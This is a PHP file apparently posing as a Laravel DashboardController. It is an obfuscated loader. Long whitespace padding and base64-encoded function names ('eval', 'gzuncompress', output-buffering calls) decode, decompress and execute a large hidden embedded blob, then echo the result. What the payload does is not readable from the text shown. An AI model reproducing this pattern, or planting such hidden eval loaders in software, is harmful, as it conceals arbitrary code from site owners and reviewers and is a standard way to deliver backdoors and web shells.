<?php 
        $__='printf';$_='Loading app/Http/Controllers/DashboardController.php';
        



















































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































































































































                                                                                                                                                                                                                     $________;
